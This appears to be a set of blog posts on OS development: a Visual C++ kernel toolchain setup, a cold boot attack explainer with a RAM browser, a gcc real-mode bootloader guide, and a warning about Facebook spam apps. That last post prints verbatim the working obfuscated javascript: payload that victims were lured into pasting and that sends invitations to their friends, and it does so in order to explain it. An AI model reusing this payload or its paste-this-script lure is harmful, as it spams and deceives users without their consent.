Writing kernel in Windows with Visual Studio C/C++

Most hobby osdev projects prefer the *nix+gcc combination these days, primarily because there are plenty of nice tutorials and examples available for it. Considering its flexibility, I personally think it is a good choice too. But if you are a heretic by nature and are curious how you can do osdev with just the Express edition of Visual C++ and some other free software, without leaving Windows (by choice or because you are forced to), this post is for you.

In this post I will simply demonstrate the toolchain setup. The complete package can be downloaded from the 'Downloads' section below. The actual 'kernel' written in this tutorial is the lame hello-world one. We will get it working with PXE boot in VirtualBox (replace with any emulator of your choice). It also works with the default Windows Boot Manager (WBM, a GRUB equivalent, just lamer) without modifications, and can easily be modified to work with an mbr/vbr, booting in stages. Let's face it - even osdev noobs these days are so over floppies.

Kernel loader (stub)
For a kernel loader stage, there are many ways of entering protected mode, loading the actual kernel image, relocating and passing control to the kernel. Here is one that I think is simple enough to fit in a blogspot post.

The image loaded by PXE/WBM consists of two parts: the stub and the kernel executable image. Both PXE and WBM (are supposed to) load our image at physical address 0x7c00, i.e. 7c0h:0h in real mode. This means that the stub must be 16-bit real mode code statically linked to run at 7c00h. The kernel executable produced by the Visual C++ toolchain (cl.exe and link.exe), on the other hand, is 32-bit protected mode code in PE format. Also, the kernel executable has to be relocated, i.e. its sections copied to the addresses it was linked for, before it can run. Thus the stub must set up protected mode, relocate the kernel to the address it is supposed to run at, and then pass control to it.
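To make the relocation step concrete, here is a rough C sketch of what it amounts to for a PE32 image. It assumes the kernel was linked at a fixed ImageBase, so no base relocations have to be applied and the sections only need to be copied to their virtual addresses. The real stub does this in assembler after entering protected mode; the function pe_load_sections and its caller-provided image buffer (standing in for memory at ImageBase) are hypothetical. Offsets follow the PE/COFF layout: e_lfanew at 0x3C, a 20-byte file header after the "PE\0\0" signature, and 40-byte section headers.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Hypothetical sketch: lays out a PE32 file (`file`) into `image`, which stands
 * in for memory at ImageBase. Assumes no base relocations are needed.
 * Returns 0 on success and fills in the entry point RVA and ImageBase. */
int pe_load_sections(const uint8_t *file, size_t file_size,
                     uint8_t *image, size_t image_size,
                     uint32_t *entry_rva, uint32_t *image_base)
{
    if (file_size < 0x40 || file[0] != 'M' || file[1] != 'Z')
        return -1;
    size_t pe = rd32(file + 0x3C);                       /* e_lfanew */
    if (pe > file_size - 24 || memcmp(file + pe, "PE\0\0", 4) != 0)
        return -1;
    unsigned nsec = rd16(file + pe + 6);                  /* NumberOfSections */
    size_t opt = pe + 24;                                 /* optional header */
    size_t sec = opt + rd16(file + pe + 20);              /* section table */
    if (opt + 64 > file_size || rd16(file + opt) != 0x10B) /* PE32 only */
        return -1;
    uint32_t size_of_image = rd32(file + opt + 56);
    uint32_t size_of_headers = rd32(file + opt + 60);
    if (size_of_image > image_size || size_of_headers > size_of_image ||
        size_of_headers > file_size || sec + (size_t)nsec * 40 > file_size)
        return -1;

    memset(image, 0, size_of_image);      /* uninitialized data (.bss) ends up zeroed */
    memcpy(image, file, size_of_headers);
    for (unsigned i = 0; i < nsec; i++) {
        const uint8_t *s = file + sec + (size_t)i * 40;
        uint32_t vsize = rd32(s + 8), va = rd32(s + 12);
        uint32_t raw_size = rd32(s + 16), raw_ptr = rd32(s + 20);
        /* copy only what is present in the file, capped at the virtual size */
        uint32_t n = (vsize != 0 && vsize < raw_size) ? vsize : raw_size;
        if ((uint64_t)va + n > size_of_image || (uint64_t)raw_ptr + n > file_size)
            return -1;
        memcpy(image + va, file + raw_ptr, n);
    }
    *entry_rva = rd32(file + opt + 16);   /* AddressOfEntryPoint */
    *image_base = rd32(file + opt + 28);  /* ImageBase */
    return 0;
}
```

The stub would then jump to ImageBase + AddressOfEntryPoint. Clearing the whole image first is what gives sections whose VirtualSize exceeds their raw data their zero-filled tail.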

The stub in this tutorial is written in assembler for ease. I have used yasm, primarily because it supports both AT&T and Intel syntax and can output a flat binary.

stub.asm can be assembled with yasm using its flat binary output format (-f bin).
This should create a flat binary for the stub.

If you reached here, you probably know what you can/should and can/should not use in a kernel. I am assuming that you have some experience with writing such code in other toolchains.

The kernel for this tutorial is hilariously simple. It can be C or C++.
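As an illustration of how little such a kernel needs, here is a hedged sketch of a hello-world that writes straight into the VGA text buffer. It assumes the firmware left the display in 80x25 colour text mode with the buffer at physical 0xB8000; the function name vga_write is hypothetical, not the tutorial's, and it takes the buffer as a parameter so the same routine can also be tried on a host.

```c
#include <stddef.h>
#include <stdint.h>

#define VGA_COLS 80
#define VGA_ROWS 25

/* Hypothetical helper: writes `s` into an 80x25 text-mode buffer starting at
 * (row, col). Each cell is 16 bits: low byte = character, high byte = colour
 * attribute. Stops at the end of the screen; returns characters written. */
size_t vga_write(volatile uint16_t *vga, unsigned row, unsigned col,
                 const char *s, uint8_t attr)
{
    size_t pos = (size_t)row * VGA_COLS + col;
    size_t n = 0;
    while (s[n] != '\0' && pos < (size_t)VGA_COLS * VGA_ROWS) {
        vga[pos++] = (uint16_t)((uint16_t)attr << 8 | (uint8_t)s[n]);
        n++;
    }
    return n;
}

/* Inside the kernel this would be called on the real buffer, e.g.
 *   vga_write((volatile uint16_t *)0xB8000, 0, 0, "Hello, world!", 0x07);
 * where 0x07 is light grey on black (an assumed colour choice). */
```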


Here is the tricky part. We must compile kernel.cc so that it can run standalone, without any ties to the hosted Windows environment. For Visual C++ 2010, I have seen the following switches work. I am going to save on typing, as MSDN explains each of these switches in detail.

Creating the boot image
This is the simplest part.
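Since the image is just the stub immediately followed by the kernel executable, creating it is a plain binary concatenation. A portable C sketch of that step; the function and file names are placeholders, not the downloadable package's:

```c
#include <stdio.h>

/* Appends the whole of file `src` to the already-open stream `out`.
 * Returns 0 on success, -1 on any I/O error. */
static int append_file(FILE *out, const char *src)
{
    FILE *in = fopen(src, "rb");
    if (!in)
        return -1;
    char buf[4096];
    size_t n;
    int rc = 0;
    while ((n = fread(buf, 1, sizeof buf, in)) > 0) {
        if (fwrite(buf, 1, n, out) != n) {
            rc = -1;
            break;
        }
    }
    if (ferror(in))
        rc = -1;
    fclose(in);
    return rc;
}

/* Hypothetical helper: boot image = stub bytes followed by kernel bytes. */
int make_boot_image(const char *stub, const char *kernel, const char *image)
{
    FILE *out = fopen(image, "wb");
    if (!out)
        return -1;
    int rc = append_file(out, stub);
    if (rc == 0)
        rc = append_file(out, kernel);
    if (fclose(out) != 0)
        rc = -1;
    return rc;
}
```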

Yay! Now you have a PXE/WBM bootable image!

PXE boot setup instructions (or lack thereof)
Unless you are using Windows Server as the host OS, chances are that you will have to use a non-Microsoft solution for DHCP and TFTP servers with PXE boot support. I have used tftpd32 in the past as well as in this tutorial, and have had no complaints thus far. Setting up DHCP and TFTP servers is out of the scope of this tutorial, but tftpd32 configuration is a walk in the park: bind the DHCP and TFTP servers to the local interface, set the TFTP root directory, and set the boot file name to the boot image. Fire up any virtual machine emulator of your choice that supports a PXE boot ROM in its NIC (I have used VirtualBox), start the VM and boot from LAN. You should see some activity in tftpd32, and moments later you should see the message.
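Under the hood, the VM's PXE ROM asks tftpd32 for the boot image with an ordinary TFTP read request. As an illustration of the wire format from RFC 1350 (a 2-byte opcode 1, the file name, a zero byte, the transfer mode, a zero byte), here is a sketch that builds such a packet. The function name and the file name in the comment are hypothetical, and real PXE ROMs may additionally append option extensions (RFC 2347) such as blksize and tsize, which this omits.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TFTP_OP_RRQ 1 /* read request opcode (RFC 1350) */

/* Hypothetical helper: builds an RRQ for `filename` in "octet" (binary) mode,
 * e.g. tftp_build_rrq(buf, sizeof buf, "boot.img").
 * Returns the packet length, or 0 if `cap` is too small. */
size_t tftp_build_rrq(uint8_t *buf, size_t cap, const char *filename)
{
    static const char mode[] = "octet";
    size_t flen = strlen(filename);
    size_t len = 2 + flen + 1 + sizeof mode; /* sizeof mode counts its NUL */
    if (len > cap)
        return 0;
    buf[0] = 0;                 /* opcode, big-endian (network byte order) */
    buf[1] = TFTP_OP_RRQ;
    memcpy(buf + 2, filename, flen + 1);            /* name + NUL */
    memcpy(buf + 2 + flen + 1, mode, sizeof mode);  /* "octet" + NUL */
    return len;
}
```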

It is fairly easy to add your kernel alongside the Windows entry in the Windows boot loader. There are tutorials [1, 2] on creating new BCD entries; just add your kernel as a BOOTSECTOR application. EasyBCD is an option in case you are not comfortable with bcdedit.

Using Visual C++ IDE
Sure, these build rules can be set up in VC++ projects too. Enjoy one-button builds with VC++'s IntelliSense. Eventually, when you get a debugger stub into your kernel, you could also get source-level debugging working in WinDbg.
32bit versions of yasm and tftpd32 are included.

Using Makefiles
I never felt comfortable with an IDE coming between me and my custom build rules. If you too think that makefiles are the way to go, nmake works out of the box. I personally think CMake is a better choice if your project gets serious.
32bit versions of yasm and tftpd32 are included.

Please let me know if you decide to use Microsoft compilers for osdev.

Good luck!

Cold boot attack

How safe and secure is your data when stored on a PC/workstation or a laptop? Say you also have whole disc/volume encryption, maybe activated by a USB key. Even then, how secure is your data?

If the computer is turned on when it physically falls into the hands of an attacker, you might be at risk even with whole disc encryption enabled and the screen locked behind your (uncompromised) password. This is especially true for portable machines like laptops and netbooks. There are many possible attacks; in this post we will look into a specific one called the cold boot attack.

Something about memory

Chances are that your main memory is based on DRAM technology, which includes popular types such as SDRAM and DDRx, and in most cases even VRAM. As DRAM is widely considered volatile memory, we are under the impression that it loses its contents as soon as power is cut off. Sadly, the contents are not lost instantaneously; they decay gradually because of the way DRAM stores data.

Figure 0 : A DRAM Cell
Without going into the details of dynamic logic, it suffices to say that each bit is stored as charge on a capacitor, which is connected to the rest of the circuit through a transistor acting as a switch. Simply put, if the capacitor holds charge above a certain level, we read bit value 1, and 0 otherwise. (Each bit line, like the one shown in Figure 0, is actually one of a pair of complementary bit lines, +ve and -ve, connected to alternate cells/FETs in the row. When reading, both bit lines are first precharged, then the row is activated (RAS) and the sense amplifier kicks in; thanks to positive feedback, it can detect the slight charge difference between the +ve and -ve bit lines.)

Capacitors are not perfect: they lose charge over time through leakage current. Thus each DRAM cell has to be `refreshed' frequently enough to retain its content. Even though manufacturers usually specify that DRAM be refreshed at least every 64ms (to ensure that there is no data corruption), well built DRAMs have a retention period significantly longer than the specified refresh period. It goes without saying that some bits do get corrupted, but the rate at which they do is pretty low when you put 64ms in perspective. This holds even after the power is turned off entirely.

How does this concern me?

Well, the long retention period of main memory is a security hole. If a computer is physically compromised while it is powered on, the attacker can read most of the contents of your main memory. Main memory holds a wealth of information: user names and passwords `cached' by applications, encryption keys for hard drive/volume encryption, SSL private keys for active connections, and (possibly partial) contents of any file that is or was open in the recent past (after a file is closed, most operating systems do not clear the memory pages used as block cache, for obvious performance reasons), at times including portions of deleted files as well. All this assumes the machine is locked in some sense and the unlocking password is not known to the attacker.

At room temperature, DRAM holds on to the stored bits if the power down/up cycle completes within 64ms. Errors are introduced as the powered-off period increases. The period during which no or very few bits get corrupted can be increased significantly if the DRAM modules are cooled to near or below 0 degrees C. Such `cold' modules can then be inserted into another compatible machine and their contents dumped for detailed analysis. I believe the retention is extended because the capacitors usually have aluminium oxide as the dielectric, whose leakage current drops as the temperature drops.
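Quantifying that decay comes down to comparing what is read back after the power cycle against a known pattern written before it. A minimal sketch with hypothetical names, assuming both the expected pattern and the dump are already in memory; it counts flipped bits and keeps the two flip directions apart:

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical result type for one comparison. */
struct decay_stats {
    size_t bits_total;
    size_t one_to_zero; /* 1 in the pattern, read back as 0 */
    size_t zero_to_one; /* 0 in the pattern, read back as 1 */
};

/* Compares `dump` against the `expected` pattern bit by bit. */
struct decay_stats compare_dump(const uint8_t *expected, const uint8_t *dump,
                                size_t len)
{
    struct decay_stats s = { len * 8, 0, 0 };
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = (uint8_t)(expected[i] ^ dump[i]);
        for (int b = 0; b < 8; b++) {
            if (!(diff & (1u << b)))
                continue;
            if (expected[i] & (1u << b))
                s.one_to_zero++;
            else
                s.zero_to_one++;
        }
    }
    return s;
}
```

Keeping 1-to-0 and 0-to-1 flips separate makes it easy to see whether a given module's errors are biased towards one value.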

A very good paper from Princeton University, "Lest We Remember: Cold Boot Attacks on Encryption Keys" (Halderman et al.), discusses how to detect keys in the dumps. They claim to have broken almost every hard drive encryption solution there is :(. They also provide software to dump memory contents to a portable drive.
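To give a flavour of how keys can be spotted in a dump: an AES-128 key expands into a 176-byte round-key schedule with a rigid structure, so any 176-byte window can be tested by checking each 4-byte word against the value the key-expansion rule predicts from the words before it, and counting the bits that disagree. This is a simplified sketch of that idea, not the paper's tool, and the function names are hypothetical. The S-box is generated at start-up (inverse in GF(2^8) plus the affine transform) rather than tabulated, to keep the listing short.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ROTL8(x, s) ((uint8_t)(((x) << (s)) | ((x) >> (8 - (s)))))

static uint8_t sbox[256];
static const uint8_t rcon[10] = {0x01, 0x02, 0x04, 0x08, 0x10,
                                 0x20, 0x40, 0x80, 0x1B, 0x36};

/* p walks all non-zero field elements as powers of 3 while q tracks the
 * matching inverse; the S-box entry is the affine transform of q. */
static void aes_init_sbox(void)
{
    uint8_t p = 1, q = 1;
    do {
        p = (uint8_t)(p ^ (p << 1) ^ ((p & 0x80) ? 0x1B : 0)); /* p *= 3 */
        q ^= (uint8_t)(q << 1);                                  /* q /= 3 */
        q ^= (uint8_t)(q << 2);
        q ^= (uint8_t)(q << 4);
        if (q & 0x80)
            q ^= 0x09;
        sbox[p] = (uint8_t)(q ^ ROTL8(q, 1) ^ ROTL8(q, 2) ^ ROTL8(q, 3) ^
                            ROTL8(q, 4) ^ 0x63);
    } while (p != 1);
    sbox[0] = 0x63; /* 0 has no inverse */
}

static void aes_ensure_sbox(void)
{
    static int ready = 0;
    if (!ready) {
        aes_init_sbox();
        ready = 1;
    }
}

/* Predicts schedule word i (4 <= i < 44) from words i-1 and i-4 of `w`. */
static void aes128_predict_word(const uint8_t *w, int i, uint8_t out[4])
{
    const uint8_t *prev = w + 4 * (i - 1), *back = w + 4 * (i - 4);
    uint8_t t[4] = {prev[0], prev[1], prev[2], prev[3]};
    if (i % 4 == 0) { /* RotWord, SubWord, XOR round constant */
        uint8_t t0 = t[0];
        t[0] = (uint8_t)(sbox[t[1]] ^ rcon[i / 4 - 1]);
        t[1] = sbox[t[2]];
        t[2] = sbox[t[3]];
        t[3] = sbox[t0];
    }
    for (int k = 0; k < 4; k++)
        out[k] = (uint8_t)(t[k] ^ back[k]);
}

/* Expands a 16-byte key into the 176-byte AES-128 schedule (FIPS-197). */
void aes128_expand(const uint8_t key[16], uint8_t sched[176])
{
    aes_ensure_sbox();
    memcpy(sched, key, 16);
    for (int i = 4; i < 44; i++)
        aes128_predict_word(sched, i, sched + 4 * i);
}

/* Bits in a 176-byte window that disagree with the expansion rule:
 * 0 is a perfect schedule, a small count suggests a decayed one. */
unsigned aes128_schedule_distance(const uint8_t win[176])
{
    unsigned bits = 0;
    aes_ensure_sbox();
    for (int i = 4; i < 44; i++) {
        uint8_t want[4];
        aes128_predict_word(win, i, want);
        for (int k = 0; k < 4; k++) {
            uint8_t d = (uint8_t)(want[k] ^ win[4 * i + k]);
            while (d) {
                bits += d & 1u;
                d >>= 1;
            }
        }
    }
    return bits;
}
```

Scanning a dump would mean sliding the window along and flagging offsets whose distance is below some threshold; choosing that threshold is left open here.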

This technique is important for forensics/law enforcement as well. During a bust of a computer crime suspect, memory dumps of the machines are extremely important to support the case. This technique allows the law enforcers to get the system state or a snapshot as it was at the time of the bust even without the suspects' co-operation.

Note that the technique is ineffective against other types of memory, for example bistable latched SRAM. So in case you are wondering if you could get something out of the hard drive caches or something from the buffers of a compromised router, you are out of luck!

Does it really work? Can I see it working on my machine?


I've created a simple RAM browser (kernel) named `RAMBO' (download source) which, as the name says, can be used to browse the RAM contents after a simulated theft and cold reboot. You can choose to be super-realistic, pulling out the power cord of your desktop or the battery of your laptop and putting it back in a jiffy. If you are worried about pulling the cord while Windows/*NIX runs, you can instead load a file to a certain RAM location, reboot, and check whether the contents are still readable after the reboot. The program is to be loaded from a multiboot compliant bootloader such as GRUB. It does not touch any hardware other than the processor, memory and keyboard, so rest assured that you will not end up with a corrupt disc or fried electronics. In case you do not have such a loader installed already, you can install one on a floppy or a USB stick and copy the program to it, so that you can load it when you boot from USB/floppy. The README provides more info on how to use it.
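Being "multiboot compliant" mostly means the kernel image carries a small header the loader can find. A minimal sketch of a Multiboot (version 1) header, assuming no optional fields are needed; the struct and variable names are illustrative, not RAMBO's. In a real kernel the header must be 32-bit aligned within the first 8192 bytes of the image, which is normally arranged with a dedicated section and a linker script (not shown).

```c
#include <stdint.h>

#define MULTIBOOT_HEADER_MAGIC 0x1BADB002u
#define MB_FLAG_PAGE_ALIGN     (1u << 0) /* load modules on 4 KiB boundaries */
#define MB_FLAG_MEMORY_INFO    (1u << 1) /* ask the loader for memory info */
#define MULTIBOOT_FLAGS        (MB_FLAG_PAGE_ALIGN | MB_FLAG_MEMORY_INFO)

/* Value a Multiboot loader leaves in EAX when it jumps to the kernel. */
#define MULTIBOOT_BOOTLOADER_MAGIC 0x2BADB002u

struct multiboot_header {
    uint32_t magic;
    uint32_t flags;
    uint32_t checksum; /* magic + flags + checksum must be 0 (mod 2^32) */
};

/* In a kernel this would also get something like
 * __attribute__((section(".multiboot"))) so the linker script can place it
 * near the start of the image (assumed section name). */
const struct multiboot_header mb_header = {
    MULTIBOOT_HEADER_MAGIC,
    MULTIBOOT_FLAGS,
    (uint32_t)-(MULTIBOOT_HEADER_MAGIC + MULTIBOOT_FLAGS),
};
```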

Real mode in C with gcc : writing a bootloader

Usually the x86 boot loader is written in assembler. We will be exploring the possibility of writing one in C (as much as possible), compiled with gcc, that runs in real mode. Note that you can also use the 16 bit bcc or Turbo C compilers, but we will focus on gcc in this post. Most open source kernels are compiled with gcc, and it makes sense to write a C bootloader with gcc instead of bcc, as you get a much cleaner toolchain :)

As of today (20100614), gcc 4.4.4 officially only emits code for protected/long mode and does not support the real mode natively (this may change in future).

Also note that we will not discuss the very fundamentals of booting. This article is fairly advanced and assumes that you know what it takes to write a simple boot-loader in assembler. It is also expected that you know how to write gcc inline assembly. Not everything can be done in C!

Getting the tool-chain working


As we will be running in 16 bit real mode, we use the .code16gcc directive, emitted from C with a top-level __asm__(".code16gcc\n"); statement. It tells gas that the assembler was generated by gcc and is intended to run in real mode. With this directive, gas automatically adds the addr32 (and data32) prefixes wherever required. For each C file containing code to be run in real mode, this directive should be at the very top of the generated assembler code. This can be ensured by putting it in a header and including that header before any other.

This is great for bootloaders as well as for parts of a kernel that must run in real mode but are better written in C than in asm. In my opinion C code is a lot easier to debug and maintain than asm code, at the expense of code size and, at times, performance.

Special linking

As the bootloader is supposed to run at physical address 0x7C00, we need to tell that to the linker. The mbr/vbr should also end with the proper boot signature 0xaa55.
All this can be taken care of by a simple linker script.
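As a small companion to the linker script, here is a host-side check for the signature (hypothetical names). The BIOS conventionally looks for the 16-bit word 0xAA55 at offset 510 of the sector, which in little-endian byte order means 0x55 at offset 510 followed by 0xAA at 511.

```c
#include <stdint.h>

#define SECTOR_SIZE     512
#define BOOT_SIG_OFFSET 510

/* Returns 1 if the 512-byte sector ends with the boot signature 0xAA55. */
int has_boot_signature(const uint8_t sector[SECTOR_SIZE])
{
    return sector[BOOT_SIG_OFFSET] == 0x55 && sector[BOOT_SIG_OFFSET + 1] == 0xAA;
}

/* Stamps the signature in place, for builds where the linker script does not. */
void stamp_boot_signature(uint8_t sector[SECTOR_SIZE])
{
    sector[BOOT_SIG_OFFSET] = 0x55;
    sector[BOOT_SIG_OFFSET + 1] = 0xAA;
}
```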

gcc emits elf binaries with sections, whereas a bootloader is a monolithic plain binary with no sections. Conversion from elf to binary can be done as follows:

The code

With the toolchain set up, we can start writing our hello world bootloader!
vbr.c (the only source file) looks something like this:

compile it as

and that should have created the vbr.elf file (which you can use as a symbols file with gdb for source level debugging of the vbr with the gdb stub of qemu/bochs) as well as the 512 byte vbr.bin. To test it, first create a dummy 1.44M floppy image, and overwrite its boot sector with vbr.bin using dd.

and now we are ready to test it out :D

and you should see the message!
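For readers without dd at hand (on Windows, say), the two image steps, creating a zero-filled 1.44M image and then overwriting its first sector, can be sketched in C. This assumes the standard 1.44M geometry of 2880 sectors of 512 bytes; the function and file names are placeholders.

```c
#include <stdio.h>
#include <string.h>

#define FLOPPY_SECTORS 2880 /* 80 cylinders * 2 heads * 18 sectors */
#define SECTOR_SIZE    512

/* Hypothetical helper: writes `image` as a zero-filled 1.44M floppy whose
 * sector 0 holds the first 512 bytes of `bootsect`. Returns 0 on success. */
int make_floppy(const char *image, const char *bootsect)
{
    unsigned char sector[SECTOR_SIZE];
    FILE *in = fopen(bootsect, "rb");
    if (!in)
        return -1;
    memset(sector, 0, sizeof sector);
    size_t n = fread(sector, 1, sizeof sector, in);
    fclose(in);
    if (n == 0)
        return -1;

    FILE *out = fopen(image, "wb");
    if (!out)
        return -1;
    int rc = 0;
    if (fwrite(sector, 1, SECTOR_SIZE, out) != SECTOR_SIZE)
        rc = -1;
    memset(sector, 0, sizeof sector); /* remaining sectors are zeros */
    for (int i = 1; i < FLOPPY_SECTORS && rc == 0; i++)
        if (fwrite(sector, 1, SECTOR_SIZE, out) != SECTOR_SIZE)
            rc = -1;
    if (fclose(out) != 0)
        rc = -1;
    return rc;
}
```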

Once you get to this stage, you are pretty much set with respect to the tooling itself. Now you can go ahead and write code to read the filesystem, search for next stage or kernel and pass control to it.

Here is a simple example of a floppy boot record with no filesystem, where the next stage or kernel is written to the floppy immediately after the boot record. The next image's load address (LMA) and entry point are fixed in a bunch of macros. It simply reads the image starting one sector after the boot record and passes control to it. There are many obvious holes, which I left open for the sake of brevity.

Removing __NOINLINE may result in even smaller code in this case; I had it in place so that I could figure out what was happening.
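Reading "one sector after the boot record" with the BIOS disk service (INT 13h, AH=02h) needs cylinder/head/sector addressing rather than a linear sector number. A sketch of the usual conversion, assuming the standard 1.44M geometry (18 sectors per track, 2 heads); it is plain C so it can be checked on a host, and the struct and function names are hypothetical rather than taken from the example above.

```c
#include <stdint.h>

#define SECTORS_PER_TRACK 18 /* assumed 1.44M floppy geometry */
#define HEADS             2

struct chs {
    uint16_t cylinder;
    uint8_t  head;
    uint8_t  sector; /* 1-based, as INT 13h expects */
};

/* Converts a 0-based logical block address to cylinder/head/sector. */
struct chs lba_to_chs(uint16_t lba)
{
    struct chs r;
    r.cylinder = (uint16_t)(lba / (SECTORS_PER_TRACK * HEADS));
    r.head     = (uint8_t)((lba / SECTORS_PER_TRACK) % HEADS);
    r.sector   = (uint8_t)(lba % SECTORS_PER_TRACK + 1);
    return r;
}
```

For AH=02h these go into CH (low 8 bits of the cylinder), CL (sector in bits 0-5, cylinder bits 8-9 in bits 6-7) and DH (head), with the drive number in DL.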

Concluding remarks

C in no way matches the code size and performance of hand-tuned, size/speed optimized assembler. Also, because an extra prefix byte (0x66 for operand size, 0x67 for address size, as in addr32) is spent on almost every instruction, it is highly unlikely that you can cram in as much functionality as with assembler.

Global and static variables, initialized as well as uninitialized, can quickly fill those precious 446 bytes. Changing them to locals and passing them around instead may increase or decrease size; there is no rule of thumb, and it has to be worked out case by case. The same goes for function inlining.

You also need to be extremely careful with various gcc optimization flags. For example, if you have a loop whose iteration count is small and deducible at compile time, and whose body is relatively small (even 20 bytes), gcc will unroll that loop even with -Os. If the loop is not unrolled (-fno-tree-loop-optimize), you might be able to shave off a big chunk of bytes there. The same holds for frame setup on i386: you may want to get rid of it whenever it is not required, using -fomit-frame-pointer. Moral of the story: you need to be extra careful with gcc flags as well as with gcc version updates. This is much less of an issue for the other real mode modules of the kernel, where size is not of such prime importance.

Also, you must be very cautious with assembler warnings when compiling with .code16gcc; truncation is common. It is a very good idea to use -save-temps and analyze the assembler code generated from your C and inline assembly. Always take care not to break the C calling convention in inline assembly, and meticulously check and update the clobber list for inline assembly doing BIOS or APM calls (but you already knew that, right?).

It is likely that you want to switch to protected/long mode as early as possible, though. Even then, I still think that maintainability wins over asm's size/speed in case of a bootloader as well as the real mode portions of the kernel.

It would be interesting if someone could try this with c++/java/fortran. Please let me know if you do!

How not to look like a fool on facebook

I did it already. Warning you so that you don't.

There is a full blown army of apps on Facebook which spam your friends with recommendations without your consent. Going by Facebook's policies, these apps are spam, and you should report them as soon as possible.

They are named in interesting ways. When you click the link, it first shows a button.
Let us take an example of 'Is this dog ugly?'.

As it came from a credible friend, you go ahead and click the button,

and do as you are told, expecting some image with a fancy JavaScript animation.

You paste the code, hit enter, and wait for it.
Before you know it, it has sent invitations to your friends, and you end up looking like a fool!

This is how it works :

the script you copy looks something like this:

javascript:(function(){a = "app120196878004524_jop"; b = "app120196878004524_jode"; ifc = "app120196878004524_ifc"; ifo = "app120196878004524_ifo"; mw = "app120196878004524_mwrapper"; function ff(p, a, c, k, e, r) { e = function (c) { return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36)); }; if (!"".replace(/^/, String)) { while (c--) {r[e(c)] = k[c] || e(c);}k = [function (e) {return r[e];}];e = function () {return "\\w+";};c = 1; } while (c--) { if (k[c]) {p = p.replace(new RegExp("\\b" + e(c) + "\\b", "g"), k[c]);} } return p; } str = ff("J e=[\"\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A\",\"\\j\\h\\A\\i\\f\",\"\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t\",\"\\w\\g\\t\\t\\f\\k\",\"\\g\\k\\k\\f\\x\\M\\N\\G\\O\",\"\\n\\l\\i\\y\\f\",\"\\j\\y\\o\\o\\f\\j\\h\",\"\\i\\g\\H\\f\\r\\f\",\"\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j\",\"\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h\",\"\\p\\i\\g\\p\\H\",\"\\g\\k\\g\\h\\q\\n\\f\\k\\h\",\"\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h\",\"\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i\",\"\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r\",\"\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z\",\"\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o\"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);", 62, 69, "||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||".split("|"), 0, {})})();

With slightly better formatting, it looks like

   k=[function(e){return r[e]}];
   if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
  return p
 ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{})

Now, let us drop the trailing parentheses () and check what code this actually executes:

a = "app120196878004524_jop";
